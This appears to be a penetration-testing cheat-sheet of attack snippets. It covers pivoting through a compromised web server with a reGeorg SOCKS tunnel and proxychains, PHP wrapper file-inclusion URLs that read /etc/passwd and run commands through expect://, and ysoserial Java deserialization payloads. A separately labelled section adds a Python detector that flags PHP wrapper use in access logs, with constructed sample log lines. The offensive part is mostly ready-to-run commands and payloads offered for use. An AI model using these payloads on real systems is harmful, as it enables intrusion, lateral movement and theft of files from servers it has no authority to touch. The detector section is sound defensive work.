Misc Cheat-Sheet
What's here?
- All kinds of snippets/attacks. :smile:
General
Use a web host as a pivot point.
- Clone the repo
- Upload the tunnel to the webserver (how you get it there is your problem :joy:)
python reGeorgSocksProxy.py -p 9050 -u http://victim_ip/tunnel.php
Now you'll get a nice SOCKS proxy through the uploaded tunnel (port 9050 is the default for proxychains; check /etc/proxychains.conf
for more info). From here you can explore the host from the inside, or do other interesting things.
proxychains nmap -sT victim_ip
proxychains ruby winrm.rb # If WinRM is only reachable from inside.
proxychains mysql -h localhost ...
PHP wrappers
http://127.0.0.1/fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
http://127.0.0.1/fileincl/example1.php?page=expect://ls
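As an added, defensive example that is not part of this cheat-sheet: a small Python detector that pulls the query string out of access-log lines and flags any PHP stream wrapper in a parameter value, generalising from the two URLs above to the other wrappers PHP accepts (data://, phar://, zip://, file://, glob://), after URL-decoding so encoded variants are still caught. The log lines are constructed and the common-log-format layout is an assumption.

```python
# Added example (not from the cheat-sheet): flag PHP stream-wrapper use in
# request URLs taken from a web-server access log. Log lines are constructed.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Wrapper schemes that should never appear in a user-controlled include path.
SUSPICIOUS_WRAPPERS = ("php://", "expect://", "data://", "phar://",
                       "zip://", "file://", "glob://")

# Common-log-format style line (assumed layout); only ip, method, path, status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def wrapper_hits(path):
    """Return (param, wrapper) pairs found in the query string of a request path.
    parse_qsl decodes once; the extra unquote catches double-encoded input."""
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        decoded = unquote(value).lower()
        for wrapper in SUSPICIOUS_WRAPPERS:
            if wrapper in decoded:
                hits.append((name, wrapper))
                break
    return hits

def scan_log(lines):
    """Return one alert dict per request whose query string carries a PHP wrapper."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hits = wrapper_hits(m.group("path"))
        if hits:
            alerts.append({"ip": m.group("ip"), "path": m.group("path"),
                           "status": m.group("status"), "hits": hits})
    return alerts

# Constructed sample log: two benign requests, two wrapper attempts
# (one plain, one URL-encoded) mirroring the URLs on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /fileincl/example1.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /fileincl/example1.php?page=expect%3A%2F%2Fls HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /static/logo.png HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Pair the alert with the response status: a 200 on a php://filter request usually means the base64-encoded file actually came back, while a 500 on expect:// often just means the extension is not loaded.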
Java object deserialization
Depending on the web app and its implementation, this can be a nice vector.
- Clone the repo
- View the payload list:
java -jar ysoserial.jar
- Generate the payload:
java -jar ysoserial.jar payload "ping 10.10.10.10"